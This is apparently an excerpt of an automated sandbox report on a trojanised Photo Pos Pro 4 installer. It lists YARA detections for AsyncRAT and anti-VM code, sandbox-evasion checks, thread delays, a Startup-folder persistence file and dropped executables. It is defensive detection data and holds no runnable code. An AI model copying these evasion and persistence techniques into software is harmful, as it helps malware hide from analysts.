                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: 00000014.00000002.1936741997.000001F10C168000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8128, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ebghls.exe PID: 7312, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5408, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: smcdll.exe PID: 5328, type: MEMORYSTR
                  Yara detected AsyncRAT
                  Source: Yara matchFile source: 41.2.MSBuild.exe.800000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 40.2.smcdll.exe.2c73d54.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 33.2.ebghls.exe.353b338.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 40.2.smcdll.exe.2c73d54.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 33.2.ebghls.exe.353b338.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000025.00000002.2982455411.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.2602950947.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.2602950947.00000000035C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000029.00000002.2632261020.0000000000802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.2600796732.0000000002CB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.2600796732.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ebghls.exe PID: 7312, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5628, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: smcdll.exe PID: 5328, type: MEMORYSTR
                  Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: ebghls.exe, 00000021.00000002.2602950947.0000000003411000.00000004.00000800.00020000.00000000.sdmp, ebghls.exe, 00000021.00000002.2602950947.00000000035C8000.00000004.00000800.00020000.00000000.sdmp, smcdll.exe, 00000028.00000002.2600796732.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, smcdll.exe, 00000028.00000002.2600796732.0000000002CB3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeMemory allocated: 1720000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeMemory allocated: 3380000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeMemory allocated: 5380000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeMemory allocated: 8B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeMemory allocated: 2470000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeMemory allocated: 4470000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: EC0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 28B0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 27E0000 memory reserve | memory write watch
                  Source: C:\Program Files\Photo Pos Pro 4\Photo Pos Pro 4.exeMemory allocated: 202B3FF0000 memory reserve | memory write watch
                  Source: C:\Program Files\Photo Pos Pro 4\Photo Pos Pro 4.exeMemory allocated: 202CDAD0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\ebghls.exeMemory allocated: 1740000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\ebghls.exeMemory allocated: 3410000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\ebghls.exeMemory allocated: 5410000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeMemory allocated: 15F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeMemory allocated: 2E90000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeMemory allocated: 2CB0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: DA0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2750000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 4750000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: D80000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2910000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 4910000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\smcdll.exeMemory allocated: F20000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\smcdll.exeMemory allocated: 2B50000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\smcdll.exeMemory allocated: 1060000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: A50000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2670000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 4670000 memory reserve | memory write watch
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeCode function: 6_2_00406D9D rdtsc 6_2_00406D9D
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 311000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 313000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 486000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 434000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 452000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 544000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 441000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 540000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 491000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 576000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 332000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 437000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 381000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 413000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 504000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 390000
                  Source: C:\Program Files\Photo Pos Pro 4\Photo Pos Pro 4.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1481Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1657Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1155Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2646Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6523
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3200
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7073
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2481
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 7641
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 1907
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 9600
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDropped PE file which has not been started: C:\Program Files\Photo Pos Pro 4\Telerik.WinControls.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIAE65.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\aiw5434265.EXEJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSICD6A.tmpJump to dropped file
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\preAA3F.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDropped PE file which has not been started: C:\Windows\Photo Pos Pro 4 Uninstaller.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDropped PE file which has not been started: C:\Program Files\Photo Pos Pro 4\PosMessageLib.NET.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDropped PE file which has not been started: C:\Program Files\Photo Pos Pro 4\Telerik.WinControls.Themes.Office2010Black.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDropped PE file which has not been started: C:\Program Files\Common Files\Thraex Software\AutoUpdator\AutoUpdator.exeJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIAD0A.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSID78E.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDropped PE file which has not been started: C:\Program Files\Photo Pos Pro 4\Telerik.WinControls.Themes.Office2010Silver.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDropped PE file which has not been started: C:\Program Files\Photo Pos Pro 4\PPPNET471service.exeJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIAEA5.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDropped PE file which has not been started: C:\Program Files\Photo Pos Pro 4\Microsoft.VisualBasic.Compatibility.dllJump to dropped file
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIA9A1.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSID50C.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDropped PE file which has not been started: C:\Program Files\Photo Pos Pro 4\TelerikCommon.dllJump to dropped file
                  Source: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeDropped PE file which has not been started: C:\Windows\Temp\{056E7126-EE52-419A-9FCE-2A38AA80538D}\.ba\wixstdba.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIADF6.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDropped PE file which has not been started: C:\Program Files\Photo Pos Pro 4\Telerik.WinControls.RadDock.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDropped PE file which has not been started: C:\Program Files\Photo Pos Pro 4\ielib64.dllJump to dropped file
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\inst5429125\dotNetFx40_Client_setup.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDropped PE file which has not been started: C:\Program Files\Photo Pos Pro 4\Telerik.WinControls.UI.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDropped PE file which has not been started: C:\Program Files\Photo Pos Pro 4\iecore.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDropped PE file which has not been started: C:\Program Files\Photo Pos Pro 4\Photo Pos Pro.dllJump to dropped file
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIA8E4.tmpJump to dropped file
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\inst5429125\vcredist_x86.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDropped PE file which has not been started: C:\Program Files\Photo Pos Pro 4\PosNetIpLib.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDropped PE file which has not been started: C:\Program Files\Photo Pos Pro 4\Microsoft.VisualBasic.PowerPacks.Vs.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIADB6.tmpJump to dropped file
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shiA856.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDropped PE file which has not been started: C:\Program Files\Photo Pos Pro 4\SkinSoft.VisualStyler.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDropped PE file which has not been started: C:\Program Files\Photo Pos Pro 4\ShellBrowser.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDropped PE file which has not been started: C:\Program Files\Photo Pos Pro 4\Telerik.WinControls.Themes.VisualStudio2012Dark.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDropped PE file which has not been started: C:\Program Files\Photo Pos Pro 4\PXBIPctl.dllJump to dropped file
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIA9FF.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIAE26.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDropped PE file which has not been started: C:\Program Files\Photo Pos Pro 4\FileDlgExtenders.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDropped PE file which has not been started: C:\Program Files\Photo Pos Pro 4\IEvolution2.dllJump to dropped file
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeEvaded block: after key decision
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeEvaded block: after key decision
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeEvaded block: after key decision
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeEvaded block: after key decision
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeEvaded block: after key decision
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeEvaded block: after key decision
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeEvaded block: after key decision
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeEvaded block: after key decision
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeEvaded block: after key decision
                  Source: C:\Windows\Installer\MSID82B.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-62922
                  Source: C:\Windows\Installer\MSID82B.tmpAPI coverage: 5.4 %
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620Thread sleep count: 1481 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624Thread sleep count: 1657 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7644Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772Thread sleep count: 1155 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772Thread sleep count: 2646 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080Thread sleep time: -19369081277395017s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7200Thread sleep count: 7073 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6812Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7196Thread sleep count: 2481 > 30
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exe TID: 7348Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exe TID: 5104Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exe TID: 5740Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep count: 38 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -35048813740048126s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -180000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7776Thread sleep count: 7641 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59873s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59765s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59656s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59542s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59412s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7776Thread sleep count: 1907 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59283s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -58860s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -58743s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -58641s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -58500s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -58333s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -58212s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -58056s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -57954s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -57829s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -57704s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -57579s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -57469s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -57344s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -57235s >= -30000s
